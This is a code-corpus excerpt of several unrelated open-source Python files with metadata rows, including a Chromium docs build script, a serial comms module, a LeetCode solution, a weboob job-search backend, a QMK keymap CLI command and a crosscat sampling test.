if not itm:
obj = self.builder.get_object(key)
if not obj:
raise Exception("Object %s not found!" % key)
self[key] = obj
itm = obj
return itm
__getattr__ = __getitem__
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def __init__(self, uipath):
""" Initializes the class. """
self.uipath = uipath
def __call__(self, clss):
""" Magic. """
def wrapper(*args, **kwargs):
clss.__builder = Gtk.Builder()
clss.__builder.add_from_file(self.uipath)
clss.objects = self.DynamicObjectsDictionary(clss.__builder)
return clss(*args, **kwargs)
return wrapper
| lgpl-2.1 | -5,219,807,691,265,484,000 | 27.505882 | 80 | 0.684276 | false |
junmin-zhu/chromium-rivertrail | chrome/common/extensions/docs/server2/build_server.py | 1 | 2634 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script is used to copy all dependencies into the local directory.
# The package of files can then be uploaded to App Engine.
import os
import shutil
import stat
import sys
SRC_DIR = os.path.join(sys.path[0], os.pardir, os.pardir, os.pardir, os.pardir,
os.pardir)
THIRD_PARTY_DIR = os.path.join(SRC_DIR, 'third_party')
LOCAL_THIRD_PARTY_DIR = os.path.join(sys.path[0], 'third_party')
TOOLS_DIR = os.path.join(SRC_DIR, 'tools')
SCHEMA_COMPILER_FILES = ['model.py', 'idl_schema.py', 'schema_util.py']
def MakeInit(path):
path = os.path.join(path, '__init__.py')
with open(os.path.join(path), 'w') as f:
os.utime(os.path.join(path), None)
def OnError(function, path, excinfo):
os.chmod(path, stat.S_IWUSR)
function(path)
def CopyThirdParty(src, dest, files=None):
dest_path = os.path.join(LOCAL_THIRD_PARTY_DIR, dest)
if not files:
shutil.copytree(src, dest_path)
MakeInit(dest_path)
return
try:
os.makedirs(dest_path)
except Exception:
pass
MakeInit(dest_path)
for filename in files:
shutil.copy(os.path.join(src, filename), os.path.join(dest_path, filename))
def main():
if os.path.isdir(LOCAL_THIRD_PARTY_DIR):
try:
shutil.rmtree(LOCAL_THIRD_PARTY_DIR, False, OnError)
except OSError:
print('*-------------------------------------------------------------*\n'
'| If you are receiving an upload error, try removing |\n'
'| chrome/common/extensions/docs/server2/third_party manually. |\n'
'*-------------------------------------------------------------*\n')
CopyThirdParty(os.path.join(THIRD_PARTY_DIR, 'handlebar'), 'handlebar')
CopyThirdParty(os.path.join(SRC_DIR, 'ppapi', 'generators'),
'json_schema_compiler')
CopyThirdParty(os.path.join(THIRD_PARTY_DIR, 'ply'),
os.path.join('json_schema_compiler', 'ply'))
CopyThirdParty(os.path.join(TOOLS_DIR, 'json_schema_compiler'),
'json_schema_compiler',
SCHEMA_COMPILER_FILES)
CopyThirdParty(TOOLS_DIR, 'json_schema_compiler', ['json_comment_eater.py'])
MakeInit(LOCAL_THIRD_PARTY_DIR)
# To be able to use the Handlebar class we need this import in __init__.py.
with open(os.path.join(LOCAL_THIRD_PARTY_DIR,
'handlebar',
'__init__.py'), 'a') as f:
f.write('from handlebar import Handlebar\n')
if __name__ == '__main__':
main()
| bsd-3-clause | 5,980,907,068,329,087,000 | 35.583333 | 80 | 0.621868 | false |
ddimensia/RaceCapture_App | autosportlabs/comms/comms.py | 1 | 5498 | import traceback
import threading
import multiprocessing
from Queue import Empty
from time import sleep
from kivy.logger import Logger
from autosportlabs.comms.commscommon import PortNotOpenException
STAY_ALIVE_TIMEOUT = 4
COMMAND_CLOSE = 'CLOSE'
COMMAND_KEEP_ALIVE = 'PING'
def connection_process_message_reader(rx_queue, connection, should_run):
Logger.debug('Comms: connection process message reader started')
while should_run.is_set():
try:
msg = connection.read_line()
if msg:
rx_queue.put(msg)
except:
Logger.error('Comms: Exception in connection_process_message_reader')
Logger.debug(traceback.format_exc())
should_run.clear()
sleep(0.5)
Logger.debug('Comms: connection process message reader exited')
def connection_process_message_writer(tx_queue, connection, should_run):
Logger.debug('Comms: connection process message writer started')
while should_run.is_set():
try:
message = tx_queue.get(True, 1.0)
if message:
connection.write(message)
except Empty:
pass
except Exception as e:
Logger.error('Comms: Exception in connection_process_message_writer ' + str(e))
Logger.debug(traceback.format_exc())
should_run.clear()
sleep(0.5)
Logger.debug('Comms: connection process message writer exited')
def connection_message_process(connection, device, rx_queue, tx_queue, command_queue):
Logger.debug('Comms: connection process starting')
try:
connection.open(device)
connection.flushInput()
connection.flushOutput()
reader_writer_should_run = threading.Event()
reader_writer_should_run.set()
reader_thread = threading.Thread(target=connection_process_message_reader, args=(rx_queue, connection, reader_writer_should_run))
reader_thread.start()
writer_thread = threading.Thread(target=connection_process_message_writer, args=(tx_queue, connection, reader_writer_should_run))
writer_thread.start()
while reader_writer_should_run.is_set():
try:
command = command_queue.get(True, STAY_ALIVE_TIMEOUT)
if command == COMMAND_CLOSE:
Logger.debug('Comms: connection process: got close command')
reader_writer_should_run.clear()
except Empty:
Logger.debug('Comms: keep alive timeout')
reader_writer_should_run.clear()
Logger.debug('Comms: connection worker exiting')
reader_thread.join()
writer_thread.join()
try:
connection.close()
except:
Logger.debug('Comms: Exception closing connection worker connection')
Logger.debug(traceback.format_exc())
except Exception as e:
Logger.debug('Comms: Exception setting up connection process: ' + str(type(e)) + str(e))
Logger.trace(traceback.format_exc())
Logger.debug('Comms: connection worker exited')
class Comms():
CONNECT_TIMEOUT = 1.0
DEFAULT_TIMEOUT = 1.0
QUEUE_FULL_TIMEOUT = 1.0
_timeout = DEFAULT_TIMEOUT
device = None
_connection = None
_connection_process = None
_rx_queue = None
_tx_queue = None
_command_queue = None
def __init__(self, device, connection):
self.device = device
self._connection = connection
self.supports_streaming = False
def start_connection_process(self):
rx_queue = multiprocessing.Queue()
tx_queue = multiprocessing.Queue(5)
command_queue = multiprocessing.Queue()
connection_process = multiprocessing.Process(target=connection_message_process, args=(self._connection, self.device, rx_queue, tx_queue, command_queue))
connection_process.start()
self._rx_queue = rx_queue
self._tx_queue = tx_queue
self._command_queue = command_queue
self._connection_process = connection_process
def get_available_devices(self):
return self._connection.get_available_devices()
def isOpen(self):
return self._connection_process != None and self._connection_process.is_alive()
def open(self):
connection = self._connection
Logger.debug('Comms: Opening connection ' + str(self.device))
self.start_connection_process()
def keep_alive(self):
try:
self._command_queue.put_nowait(COMMAND_KEEP_ALIVE)
except:
pass
def close(self):
Logger.debug('Comms: comms.close()')
if self.isOpen():
try:
Logger.debug('Comms: closing connection process')
self._command_queue.put_nowait(COMMAND_CLOSE)
self._connection_process.join(self._timeout * 2)
Logger.debug('Comms: connection process joined')
except:
Logger.error('Comms: Timeout joining connection process')
def read_message(self):
if not self.isOpen():
raise PortNotOpenException('Port Closed')
try:
return self._rx_queue.get(True, self._timeout)
except: # returns Empty object if timeout is hit
return None
def write_message(self, message):
if not self.isOpen(): raise PortNotOpenException('Port Closed')
self._tx_queue.put(message, True, Comms.QUEUE_FULL_TIMEOUT)
| gpl-3.0 | -2,222,995,248,042,992,600 | 34.701299 | 160 | 0.631139 | false |
franklingu/leetcode-solutions | questions/palindrome-linked-list/Solution.py | 1 | 1513 | """
Given a singly linked list, determine if it is a palindrome.
Example 1:
Input: 1->2
Output: false
Example 2:
Input: 1->2->2->1
Output: true
Follow up:
Could you do it in O(n) time and O(1) space?
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def isPalindrome(self, head):
"""
:type head: ListNode
:rtype: bool
"""
def reverse_ll(head):
prev, curr, ne = None, head, head.next
while curr is not None:
curr.next = prev
prev = curr
curr = ne
if ne:
ne = ne.next
return prev
if head is None or head.next is None:
return True
fast, slow = head, head
while fast is not None:
fast = fast.next
if fast is None:
break
fast = fast.next
if fast is None:
break
slow = slow.next
second = slow.next
slow.next = None
new_head = reverse_ll(second)
curr1, curr2 = head, new_head
ret = True
while curr1 is not None and curr2 is not None:
if curr1.val != curr2.val:
ret = False
break
curr1 = curr1.next
curr2 = curr2.next
slow.next = reverse_ll(new_head)
return ret
| mit | -2,569,556,633,888,039,400 | 23.403226 | 60 | 0.489095 | false |
blckshrk/Weboob | modules/popolemploi/backend.py | 1 | 17379 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 Bezleputh
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.backend import BaseBackend, BackendConfig
from weboob.capabilities.job import ICapJob
from weboob.tools.value import Value
from weboob.tools.ordereddict import OrderedDict
from .browser import PopolemploiBrowser
from .job import PopolemploiJobAdvert
__all__ = ['PopolemploiBackend']
class PopolemploiBackend(BaseBackend, ICapJob):
NAME = 'popolemploi'
DESCRIPTION = u'Pole Emploi website'
MAINTAINER = u'Bezleputh'
EMAIL = '[email protected]'
VERSION = '0.h'
BROWSER = PopolemploiBrowser
places_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
'100|FRANCE|FRANCE': u'France entière',
'102|REGION|checkbox': u'Alsace',
'103|DEPARTEMENT|checkbox_66': u'-- Rhin (Bas) (67)',
'104|DEPARTEMENT|checkbox_67': u'-- Rhin (Haut) (68)',
'105|REGION|checkbox_0': u'Aquitaine',
'106|DEPARTEMENT|checkbox_21': u'-- Dordogne (24)',
'107|DEPARTEMENT|checkbox_32': u'-- Gironde (33)',
'108|DEPARTEMENT|checkbox_39': u'-- Landes (40)',
'109|DEPARTEMENT|checkbox_46': u'-- Lot et Garonne (47)',
'110|DEPARTEMENT|checkbox_63': u'-- Pyrénées Atlantiques (64)',
'111|REGION|checkbox_1': u'Auvergne',
'112|DEPARTEMENT|checkbox_1': u'-- Allier (03)',
'113|DEPARTEMENT|checkbox_13': u'-- Cantal (15)',
'114|DEPARTEMENT|checkbox_42': u'-- Loire (Haute) (43)',
'115|DEPARTEMENT|checkbox_62': u'-- Puy de Dôme (63)',
'116|REGION|checkbox_2': u'Bourgogne',
'117|DEPARTEMENT|checkbox_18': u'-- Côte d\'Or (21)',
'118|DEPARTEMENT|checkbox_57': u'-- Nièvre (58)',
'119|DEPARTEMENT|checkbox_70': u'-- Saône et Loire (71)',
'120|DEPARTEMENT|checkbox_88': u'-- Yonne (89)',
'121|REGION|checkbox_3': u'Bretagne',
'122|DEPARTEMENT|checkbox_19': u'-- Côtes d\'Armor (22)',
'123|DEPARTEMENT|checkbox_26': u'-- Finistère (29)',
'124|DEPARTEMENT|checkbox_34': u'-- Ille et Vilaine (35)',
'125|DEPARTEMENT|checkbox_54': u'-- Morbihan (56)',
'126|REGION|checkbox_4': u'Centre',
'127|DEPARTEMENT|checkbox_16': u'-- Cher (18)',
'128|DEPARTEMENT|checkbox_25': u'-- Eure et Loir (28)',
'129|DEPARTEMENT|checkbox_35': u'-- Indre (36)',
'130|DEPARTEMENT|checkbox_36': u'-- Indre et Loire (37)',
'131|DEPARTEMENT|checkbox_40': u'-- Loir et Cher (41)',
'132|DEPARTEMENT|checkbox_44': u'-- Loiret (45)',
'133|REGION|checkbox_5': u'Champagne Ardenne',
'134|DEPARTEMENT|checkbox_6': u'-- Ardennes (08)',
'135|DEPARTEMENT|checkbox_8': u'-- Aube (10)',
'136|DEPARTEMENT|checkbox_50': u'-- Marne (51)',
'137|DEPARTEMENT|checkbox_51': u'-- Marne (Haute) (52)',
'138|REGION|checkbox_6': u'Corse',
'139|DEPARTEMENT|checkbox_26': u'-- Corse du Sud (2A)',
'140|DEPARTEMENT|checkbox_27': u'-- Haute Corse (2B)',
'141|REGION|checkbox_7': u'Franche Comté',
'142|DEPARTEMENT|checkbox_89': u'-- Belfort (Territoire de) (90)',
'143|DEPARTEMENT|checkbox_22': u'-- Doubs (25)',
'144|DEPARTEMENT|checkbox_38': u'-- Jura (39)',
'145|DEPARTEMENT|checkbox_69': u'-- Saône (Haute) (70)',
'146|REGION|checkbox_8': u'Ile de France',
'147|DEPARTEMENT|checkbox_90': u'-- Essonne (91)',
'148|DEPARTEMENT|checkbox_91': u'-- Hauts de Seine (92)',
'149|DEPARTEMENT|checkbox_74': u'-- Paris (Dept.) (75)',
'150|DEPARTEMENT|checkbox_92': u'-- Seine Saint Denis (93)',
'151|DEPARTEMENT|checkbox_76': u'-- Seine et Marne (77)',
'152|DEPARTEMENT|checkbox_94': u'-- Val d\'Oise (95)',
'153|DEPARTEMENT|checkbox_93': u'-- Val de Marne (94)',
'154|DEPARTEMENT|checkbox_77': u'-- Yvelines (78)',
'155|REGION|checkbox_9': u'Languedoc Roussillon',
'156|DEPARTEMENT|checkbox_9': u'-- Aude (11)',
'157|DEPARTEMENT|checkbox_39': u'-- Gard (30)',
'158|DEPARTEMENT|checkbox_33': u'-- Hérault (34)',
'159|DEPARTEMENT|checkbox_47': u'-- Lozère (48)',
'161|DEPARTEMENT|checkbox_65': u'-- Pyrénées Orientales (66)',
'162|REGION|checkbox_10': u'Limousin',
'163|DEPARTEMENT|checkbox_17': u'-- Corrèze (19)',
'164|DEPARTEMENT|checkbox_20': u'-- Creuse (23)',
'165|DEPARTEMENT|checkbox_86': u'-- Vienne (Haute) (87)',
'166|REGION|checkbox_11': u'Lorraine',
'167|DEPARTEMENT|checkbox_53': u'-- Meurthe et Moselle (54)',
'168|DEPARTEMENT|checkbox_54': u'-- Meuse (55)',
'169|DEPARTEMENT|checkbox_56': u'-- Moselle (57)',
'170|DEPARTEMENT|checkbox_87': u'-- Vosges (88)',
'171|REGION|checkbox_12': u'Midi Pyrénées',
'172|DEPARTEMENT|checkbox_7': u'-- Ariège (09)',
'173|DEPARTEMENT|checkbox_10': u'-- Aveyron (12)',
'174|DEPARTEMENT|checkbox_30': u'-- Garonne (Haute) (31)',
'175|DEPARTEMENT|checkbox_31': u'-- Gers (32)',
'176|DEPARTEMENT|checkbox_45': u'-- Lot (46)',
'177|DEPARTEMENT|checkbox_64': u'-- Pyrénées (Hautes) (65)',
'178|DEPARTEMENT|checkbox_80': u'-- Tarn (81)',
'179|DEPARTEMENT|checkbox_81': u'-- Tarn et Garonne (82)',
'180|REGION|checkbox_13': u'Nord Pas de Calais',
'181|DEPARTEMENT|checkbox_58': u'-- Nord (59)',
'182|DEPARTEMENT|checkbox_61': u'-- Pas de Calais (62)',
'183|REGION|checkbox_14': u'Normandie (Basse)',
'184|DEPARTEMENT|checkbox_12': u'-- Calvados (14)',
'185|DEPARTEMENT|checkbox_49': u'-- Manche (50)',
'186|DEPARTEMENT|checkbox_60': u'-- Orne (61)',
'187|REGION|checkbox_15': u'Normandie (Haute)',
'188|DEPARTEMENT|checkbox_24': u'-- Eure (27)',
'189|DEPARTEMENT|checkbox_75': u'-- Seine Maritime (76)',
'190|REGION|checkbox_16': u'Pays de la Loire',
'191|DEPARTEMENT|checkbox_43': u'-- Loire Atlantique (44)',
'192|DEPARTEMENT|checkbox_48': u'-- Maine et Loire (49)',
'193|DEPARTEMENT|checkbox_52': u'-- Mayenne (53)',
'194|DEPARTEMENT|checkbox_71': u'-- Sarthe (72)',
'195|DEPARTEMENT|checkbox_84': u'-- Vendée (85)',
'196|REGION|checkbox_17': u'Picardie',
'197|DEPARTEMENT|checkbox_0': u'-- Aisne (02)',
'198|DEPARTEMENT|checkbox_59': u'-- Oise (60)',
'199|DEPARTEMENT|checkbox_79': u'-- Somme (80)',
'200|REGION|checkbox_18': u'Poitou Charentes',
'201|DEPARTEMENT|checkbox_14': u'-- Charente (16)',
'202|DEPARTEMENT|checkbox_15': u'-- Charente Maritime (17)',
'203|DEPARTEMENT|checkbox_78': u'-- Sèvres (Deux) (79)',
'204|DEPARTEMENT|checkbox_85': u'-- Vienne (86)',
'205|REGION|checkbox_19': u'Provence Alpes Côte d\'Azur',
'206|DEPARTEMENT|checkbox_3': u'-- Alpes (Hautes) (05)',
'207|DEPARTEMENT|checkbox_4': u'-- Alpes Maritimes (06)',
'208|DEPARTEMENT|checkbox_2': u'-- Alpes de Haute Provence (04)',
'209|DEPARTEMENT|checkbox_13': u'-- Bouches du Rhône (13)',
'210|DEPARTEMENT|checkbox_82': u'-- Var (83)',
'211|DEPARTEMENT|checkbox_83': u'-- Vaucluse (84)',
'212|REGION|checkbox_20': u'Rhône Alpes',
'213|DEPARTEMENT|checkbox': u'-- Ain (01)',
'214|DEPARTEMENT|checkbox_5': u'-- Ardèche (07)',
'215|DEPARTEMENT|checkbox_23': u'-- Drôme (26)',
'216|DEPARTEMENT|checkbox_37': u'-- Isère (38)',
'217|DEPARTEMENT|checkbox_41': u'-- Loire (42)',
'218|DEPARTEMENT|checkbox_68': u'-- Rhône (69)',
'219|DEPARTEMENT|checkbox_72': u'-- Savoie (73)',
'220|DEPARTEMENT|checkbox_73': u'-- Savoie (Haute) (74)',
'221|REGION|checkbox_21': u'Région Antilles / Guyane',
'222|DEPARTEMENT|checkbox_95': u'-- Guadeloupe (971)',
'223|DEPARTEMENT|checkbox_97': u'-- Guyane (973)',
'224|DEPARTEMENT|checkbox_96': u'-- Martinique (972)',
'225|DEPARTEMENT|checkbox_101': u'-- Saint Barthélémy (977)',
'226|DEPARTEMENT|checkbox_102': u'-- Saint Martin (978)',
'227|REGION|checkbox_22': u'Région Atlantique Nord',
'228|DEPARTEMENT|checkbox_99': u'-- Saint Pierre et Miquelon (975)',
'229|REGION|checkbox_23': u'Région Pacifique',
'230|DEPARTEMENT|checkbox_107': u'-- Ile de Clipperton (989)',
'231|DEPARTEMENT|checkbox_106': u'-- Nouvelle Calédonie (988)',
'232|DEPARTEMENT|checkbox_105': u'-- Polynésie française (987)',
'233|DEPARTEMENT|checkbox_103': u'-- Terres australes/antarctiques (984)',
'234|DEPARTEMENT|checkbox_104': u'-- Wallis et Futuna (986)',
'235|REGION|checkbox_24': u'Région Réunion / Mayotte',
'236|DEPARTEMENT|checkbox_100': u'-- Mayotte (976)',
'237|DEPARTEMENT|checkbox_98': u'-- Réunion (974)',
}.iteritems())])
type_contrat_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Tous types de contrats',
'11': u'CDI tout public',
'14': u'CDI alternance',
'13': u'CDI insertion',
'12': u'CDD tout public',
'16': u'CDD alternance',
'15': u'CDD insertion',
'10': u'CDD Senior',
'3': u'Mission d\'intérim',
'4': u'Contrat de travail saisonnier',
'5': u'Contrat de travail intermittent',
'8': u'Franchise',
'7': u'Profession libérale',
'9': u'Reprise d\'entreprise',
'6': u'Profession commerciale',
}.iteritems())])
salary_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Tout salaire annuel',
'FOURCHETTE1': u'Moins de 15000',
'FOURCHETTE2': u'Compris entre 15000 et 18000',
'FOURCHETTE3': u'Compris entre 18000 et 21000',
'FOURCHETTE4': u'Compris entre 21000 et 24000',
'FOURCHETTE5': u'Compris entre 24000 et 36000',
'FOURCHETTE6': u'Compris entre 36000 et 60000',
'FOURCHETTE7': u'Supérieur à 60000',
}.iteritems())])
qualification_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Toute Qualification',
'1': u'Manoeuvre',
'2': u'Ouvrier spécialisé',
'3': u'Ouvrier qualifié (P1,P2)',
'4': u'Ouvrier qualifié (P3,P4,OHQ)',
'5': u'Employé non qualifié',
'6': u'Employé qualifié',
'7': u'Technicien',
'8': u'Agent de maîtrise',
'9': u'Cadre',
}.iteritems())])
limit_date_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
'': u'Aucune limite',
'UN_JOUR': u'Hier',
'TROIS_JOUR': u'3 jours',
'UNE_SEMAINE': u'1 semaine',
'DEUX_SEMAINES': u'2 semaines',
'UN_MOIS': u'1 mois',
'TROIS_MOIS': u'3 mois',
}.iteritems())])
domain_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Tout secteur d\'activité',
'88': u'Action sociale sans hebergt',
'82': u'Activ.admin/soutien entreprise',
'66': u'Activ. auxiliaire finance/assu',
'90': u'Activ. crea/artistiq/spectacle',
'77': u'Activ. de loc. et loc.-bail',
'70': u'Activ. siege soc/conseil gest.',
'93': u'Activ. sportive/recreat/loisir',
'69': u'Activite juridique/comptable',
'94': u'Activite organisations assoc.',
'86': u'Activite pr la sante humaine',
'53': u'Activites de poste/courrier',
'64': u'Activite services financiers',
'68': u'Activites immobilieres',
'62': u'Activites informatiques',
'78': u'Activites liees a l\'emploi',
'75': u'Activites veterinaires',
'84': u'Administration publiq/defense',
'79': u'Agences voyage/activ. liees',
'71': u'Archi/ing/control/analyse tech',
'65': u'Assurance',
'32': u'Autre industrie manufacturiere',
'74': u'Autres activ.spe scientif/tech',
'08': u'Autres industries extractives',
'91': u'Biblio/ musée/ activ. culturel',
'36': u'Captage/traitement/distrib.eau',
'19': u'Cokefaction et raffinage',
'37': u'Collecte/traitement eaux usees',
'38': u'Collecte/traitnt/elimin dechet',
'45': u'Commerce/reparation auto/moto',
'47': u'Commerce detail sauf auto/moto',
'46': u'Commerce gros sauf auto/moto',
'41': u'Construction de batiments',
'01': u'Cult./prod. animale, chasse',
'39': u'Depollution/autre gest. dechet',
'58': u'Edition',
'80': u'Enquetes et securite',
'85': u'Enseignement',
'52': u'Entreposage/sce auxil. transp',
'06': u'Extraction d\'hydrocarbures',
'05': u'Extraction houille/ lignite',
'07': u'Extraction minerais metalliq.',
'26': u'Fab. prod. info/electro/optiq',
'22': u'Fabr. prod. caoutchouc/plastiq',
'30': u'Fabric. autre materiel transp.',
'23': u'Fabric.autre produit non metal',
'28': u'Fabric. autres machines/equip.',
'27': u'Fabric. d\'equip. electriques',
'31': u'Fabrication de meubles',
'12': u'Fabrication produit base tabac',
'25': u'Fabrication produits metalliq',
'42': u'Genie civil',
'55': u'Hebergement',
'87': u'Hebergt médico-social/ social',
'18': u'Imprimerie/reprod. enregistre.',
'00': u'Indetermine',
'29': u'Industrie automobile',
'20': u'Industrie chimique',
'14': u'Industrie de l\'habillement',
'11': u'Industrie des boissons',
'15': u'Industrie du cuir/la chaussure',
'17': u'Industrie du papier/du carton',
'21': u'Industrie pharmaceutique',
'10': u'Industries alimentaires',
'13': u'Industrie textile',
'24': u'Metallurgie',
'92': u'Orga. jeux hasard/argent',
'99': u'Organisations et organismes',
'03': u'Peche et aquaculture',
'35': u'Prod./distrib.elec/gaz/vap/air',
'59': u'Prod film cine/video/tv/musiq',
'98': u'Production menage bien propre',
'60': u'Programmation et diffusion',
'73': u'Publicite et etudes de marche',
'72': u'Rech.-dev. scientifique',
'33': u'Repar./instal. machines/equip.',
'95': u'Repar.pc/biens perso/domestiq',
'56': u'Restauration',
'97': u'Sce domestique pr particuliers',
'81': u'Services bat/amenagnt paysager',
'63': u'Services d\'information',
'96': u'Services personnels',
'09': u'Soutien industries extractives',
'02': u'Sylvicult./exploit. forestiere',
'61': u'Telecommunications',
'51': u'Transports aeriens',
'50': u'Transports par eau',
'49': u'Transports terrestres',
'16': u'Travail bois/fab. article bois',
'43': u'Travaux constr.specialises',
}.iteritems())])
CONFIG = BackendConfig(Value('metier', label='Job name', masked=False, default=''),
Value('place', label=u'Place', choices=places_choices, default='100|FRANCE|FRANCE'),
Value('contrat', label=u'Contract', choices=type_contrat_choices, default=''),
Value('salary', label=u'Salary', choices=salary_choices, default=''),
Value('qualification', label=u'Qualification', choices=qualification_choices, default=''),
Value('limit_date', label=u'Date limite', choices=limit_date_choices, default=''),
Value('domain', label=u'Domain', choices=domain_choices, default=''))
def search_job(self, pattern=None):
with self.browser:
return self.browser.search_job(pattern=pattern)
def advanced_search_job(self):
return self.browser.advanced_search_job(metier=self.config['metier'].get(),
place=self.config['place'].get(),
contrat=self.config['contrat'].get(),
salary=self.config['salary'].get(),
qualification=self.config['qualification'].get(),
limit_date=self.config['limit_date'].get(),
domain=self.config['domain'].get())
def get_job_advert(self, _id, advert=None):
with self.browser:
return self.browser.get_job_advert(_id, advert)
def fill_obj(self, advert, fields):
self.get_job_advert(advert.id, advert)
OBJECTS = {PopolemploiJobAdvert: fill_obj}
| agpl-3.0 | 5,952,296,868,497,060,000 | 48.070822 | 117 | 0.58163 | false |
nelseric/qmk_firmware | lib/python/qmk/cli/new/keymap.py | 16 | 1884 | """This script automates the copying of the default keymap into your own keymap.
"""
import shutil
from pathlib import Path
import qmk.path
from qmk.decorators import automagic_keyboard, automagic_keymap
from milc import cli
@cli.argument('-kb', '--keyboard', help='Specify keyboard name. Example: 1upkeyboards/1up60hse')
@cli.argument('-km', '--keymap', help='Specify the name for the new keymap directory')
@cli.subcommand('Creates a new keymap for the keyboard of your choosing')
@automagic_keyboard
@automagic_keymap
def new_keymap(cli):
"""Creates a new keymap for the keyboard of your choosing.
"""
# ask for user input if keyboard or keymap was not provided in the command line
keyboard = cli.config.new_keymap.keyboard if cli.config.new_keymap.keyboard else input("Keyboard Name: ")
keymap = cli.config.new_keymap.keymap if cli.config.new_keymap.keymap else input("Keymap Name: ")
# generate keymap paths
kb_path = Path('keyboards') / keyboard
keymap_path = qmk.path.keymap(keyboard)
keymap_path_default = keymap_path / 'default'
keymap_path_new = keymap_path / keymap
# check directories
if not kb_path.exists():
cli.log.error('Keyboard %s does not exist!', kb_path)
return False
if not keymap_path_default.exists():
cli.log.error('Keyboard default %s does not exist!', keymap_path_default)
return False
if keymap_path_new.exists():
cli.log.error('Keymap %s already exists!', keymap_path_new)
return False
# create user directory with default keymap files
shutil.copytree(keymap_path_default, keymap_path_new, symlinks=True)
# end message to user
cli.log.info("%s keymap directory created in: %s", keymap, keymap_path_new)
cli.log.info("Compile a firmware with your new keymap by typing: \n\n\tqmk compile -kb %s -km %s\n", keyboard, keymap)
| gpl-2.0 | 5,085,182,209,697,416,000 | 39.085106 | 122 | 0.706476 | false |
fivejjs/crosscat | crosscat/cython_code/test_sample.py | 1 | 4283 | #
# Copyright (c) 2010-2014, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
from collections import Counter
#
import numpy
import pylab
pylab.ion()
pylab.show()
#
import crosscat.tests.plot_utils as pu
import crosscat.utils.file_utils as fu
import crosscat.utils.sample_utils as su
import crosscat.utils.api_utils as au
# parse some arguments
parser = argparse.ArgumentParser()
parser.add_argument('pkl_name', type=str)
parser.add_argument('--inf_seed', default=0, type=int)
parser.add_argument('--hostname', default='127.0.0.1', type=str)
args = parser.parse_args()
pkl_name = args.pkl_name
inf_seed = args.inf_seed
hostname = args.hostname
# FIXME: getting weird error on conversion to int: too large from inside pyx
def get_next_seed(max_val=32767): # sys.maxint):
return random_state.randint(max_val)
# resume from saved name
save_dict = fu.unpickle(pkl_name)
random_state = numpy.random.RandomState(inf_seed)
M_c = save_dict['M_c']
X_L = save_dict['X_L']
X_D = save_dict['X_D']
# FIXME: test constraints
# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]
Y = None
# test simple_predictive_sample_observed
views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
this_view_this_sample = su.simple_predictive_sample(
M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on local' % view_idx)
# test simple_predictive_sample_observed REMOTE
# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com'
URI = 'http://' + hostname + ':8007'
method_name = 'simple_predictive_sample'
#
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
args_dict = dict(
M_c=save_dict['M_c'],
X_L=save_dict['X_L'],
X_D=save_dict['X_D'],
Y=replicating_sample_params['Y'],
Q=replicating_sample_params['Q'],
n=replicating_sample_params['n'],
)
this_view_this_sample, id = au.call(
method_name, args_dict, URI)
print id
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx)
# test simple_predictive_sample_unobserved
observed_Q = views_replicating_samples_params[0][0]['Q']
Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]
new_row_samples = []
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1000)
new_row_samples.extend(new_row_sample)
new_row_samples = numpy.array(new_row_samples)
pu.plot_T(new_row_samples)
# once more with constraint
Y = [(int(1E6), 0, 100)]
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1)
# test impute
# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)
| apache-2.0 | 8,966,423,893,119,867,000 | 35.29661 | 84 | 0.69951 | false |
brahle/I-Rcbot | irc/mysocket.py | 1 | 1895 | #!/usr/bin/env python2.6
# Zeckviz IRC bot
